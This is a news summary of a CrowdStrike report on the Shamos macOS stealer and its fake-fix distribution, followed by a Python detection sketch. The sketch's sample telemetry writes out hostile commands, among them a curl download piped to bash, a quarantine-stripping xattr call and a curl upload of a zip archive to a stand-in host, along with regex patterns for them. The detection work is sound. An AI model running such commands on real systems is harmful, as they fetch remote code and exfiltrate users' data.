Particle.news

Cookie Spider Pushes New ‘Shamos’ Mac Stealer Through Fake Fixes, Researchers Say

CrowdStrike reports over 300 attempted infections since June after fake support pages prompt a one-line Terminal command that bypasses Gatekeeper.

Overview

  • The AMOS-family variant, dubbed Shamos, harvests Keychain items, Apple Notes, browser data and cryptocurrency wallets, then zips and exfiltrates the files using curl.
  • Distribution relies on malvertising and ClickFix pages or fake GitHub repositories that instruct users to paste a single command, which downloads a Bash script and the Mach-O payload.
  • The script removes Gatekeeper quarantine with xattr and chmod, captures the user’s password, performs anti-VM checks and conducts host reconnaissance via AppleScript.
  • When run with sudo, Shamos creates a LaunchDaemons plist named com.finder.helper.plist for persistence and can pull additional payloads, including a spoofed Ledger Live app and a botnet module.
  • CrowdStrike observed global targeting and evidence of an impersonated Australia-based electronics retailer in Google Ads, with ads intentionally not served to Russian users.
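The chain above, seen from the detection side. The following is an added example, not CrowdStrike's tooling or code from this page: it scans process-execution and file-write telemetry for the behaviours the summary lists (a curl download piped into a shell, quarantine attributes stripped with xattr, a plist written under /Library/LaunchDaemons, a zip archive uploaded with curl) and correlates hits by process tree. The event schema (type, ts, pid, ppid, user, cmd, path) and the sample events are constructed for illustration and do not reflect any real EDR format; only the plist name com.finder.helper.plist comes from the report.

```python
"""Detection sketch for the stealer behaviour summarized above (added example,
not CrowdStrike's code). Event schema and sample events are constructed."""
import re
import shlex
from collections import defaultdict

QUARANTINE_ATTR = "com.apple.quarantine"
LAUNCH_DAEMONS = "/Library/LaunchDaemons/"
KNOWN_BAD_PLIST = "com.finder.helper.plist"  # persistence file name from the report

# "curl ... | bash" and 'bash -c "$(curl ...)"' forms of a pasted one-liner
_PIPE_RE = re.compile(r"\bcurl\b[^|]*\|\s*(?:/bin/|/usr/bin/)?(?:ba|z)?sh\b")
_SUBST_RE = re.compile(r"\b(?:ba|z)?sh\b\s+-c\s+[\"']?\$\(\s*curl\b")
_UPLOAD_FLAGS = {"-F", "--form", "-T", "--upload-file", "-d", "--data", "--data-binary"}


def _argv(cmd):
    """Tokenize a command line; unbalanced quoting yields an empty list."""
    try:
        return shlex.split(cmd)
    except ValueError:
        return []


def _binary(argv):
    return argv[0].rsplit("/", 1)[-1] if argv else ""


def is_curl_pipe_to_shell(cmd):
    return bool(_PIPE_RE.search(cmd) or _SUBST_RE.search(cmd))


def strips_quarantine(cmd):
    """xattr -c (clear all attributes) or xattr -d com.apple.quarantine."""
    argv = _argv(cmd)
    if _binary(argv) != "xattr":
        return False
    clusters = [a[1:] for a in argv[1:] if a.startswith("-") and not a.startswith("--")]
    if any("c" in c for c in clusters):
        return True
    return any("d" in c for c in clusters) and QUARANTINE_ATTR in argv


def is_curl_upload(cmd):
    """curl pushing a .zip with an upload flag: the exfiltration step above."""
    argv = _argv(cmd)
    if _binary(argv) != "curl":
        return False
    return any(a in _UPLOAD_FLAGS for a in argv) and any(".zip" in a.lower() for a in argv)


def _root(pid, parent):
    """Walk up to the oldest ancestor present in the telemetry (cycle-safe)."""
    seen = set()
    while pid not in seen and parent.get(pid) in parent:
        seen.add(pid)
        pid = parent[pid]
    return pid


def analyze(events):
    """Per-event findings, plus one high-severity 'stealer_chain' finding for
    any process tree combining quarantine stripping with another behaviour."""
    parent = {ev["pid"]: ev["ppid"] for ev in events}
    findings, per_tree = [], defaultdict(set)
    for ev in events:
        hits = []
        if ev["type"] == "exec":
            if is_curl_pipe_to_shell(ev["cmd"]):
                hits.append(("curl_pipe_shell", "medium"))
            if strips_quarantine(ev["cmd"]):
                hits.append(("quarantine_strip", "medium"))
            if is_curl_upload(ev["cmd"]):
                hits.append(("curl_upload_archive", "medium"))
        elif ev["type"] == "file_write" and ev["path"].startswith(LAUNCH_DAEMONS):
            known = ev["path"].endswith("/" + KNOWN_BAD_PLIST)
            hits.append(("launchdaemon_plist_write", "high" if known else "low"))
        root = _root(ev["pid"], parent)
        for rule, severity in hits:
            findings.append({"rule": rule, "severity": severity, "pid": ev["pid"],
                             "user": ev["user"], "tree": root, "ts": ev["ts"]})
            per_tree[root].add(rule)
    for root, rules in per_tree.items():
        if "quarantine_strip" in rules and len(rules) > 1:
            findings.append({"rule": "stealer_chain", "severity": "high", "pid": root,
                             "user": None, "tree": root, "ts": None, "rules": sorted(rules)})
    return findings


# Constructed telemetry: one malicious tree rooted at pid 501, then benign noise.
SAMPLE_EVENTS = [
    {"type": "exec", "ts": 1, "pid": 501, "ppid": 400, "user": "jdoe",
     "cmd": "curl -fsSL https://example.invalid/install.sh | bash"},
    {"type": "exec", "ts": 2, "pid": 502, "ppid": 501, "user": "jdoe",
     "cmd": "xattr -c /Users/jdoe/Downloads/update"},
    {"type": "exec", "ts": 3, "pid": 503, "ppid": 501, "user": "jdoe",
     "cmd": "chmod +x /Users/jdoe/Downloads/update"},
    {"type": "file_write", "ts": 4, "pid": 505, "ppid": 501, "user": "root",
     "path": "/Library/LaunchDaemons/com.finder.helper.plist"},
    {"type": "exec", "ts": 5, "pid": 506, "ppid": 501, "user": "jdoe",
     "cmd": "curl -F file=@/tmp/out.zip https://example.invalid/upload"},
    {"type": "exec", "ts": 6, "pid": 601, "ppid": 300, "user": "jdoe",
     "cmd": "curl -fsSL https://example.invalid/readme.txt -o readme.txt"},
    {"type": "exec", "ts": 7, "pid": 602, "ppid": 300, "user": "jdoe",
     "cmd": "xattr -l /Users/jdoe/Downloads/report.pdf"},
    {"type": "file_write", "ts": 8, "pid": 603, "ppid": 300, "user": "jdoe",
     "path": "/Users/jdoe/Library/LaunchAgents/com.example.sync.plist"},
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding)
```

The per-event rules are deliberately noisy on their own (developers clear quarantine flags, installers write daemons), which is why the tree-level `stealer_chain` finding carries the high severity: a single pasted command that downloads a script, strips quarantine and then persists or uploads an archive is the pattern the report describes, and correlating by ancestry rather than by parent pid keeps the children of the spawned bash in the same tree as the curl that started it.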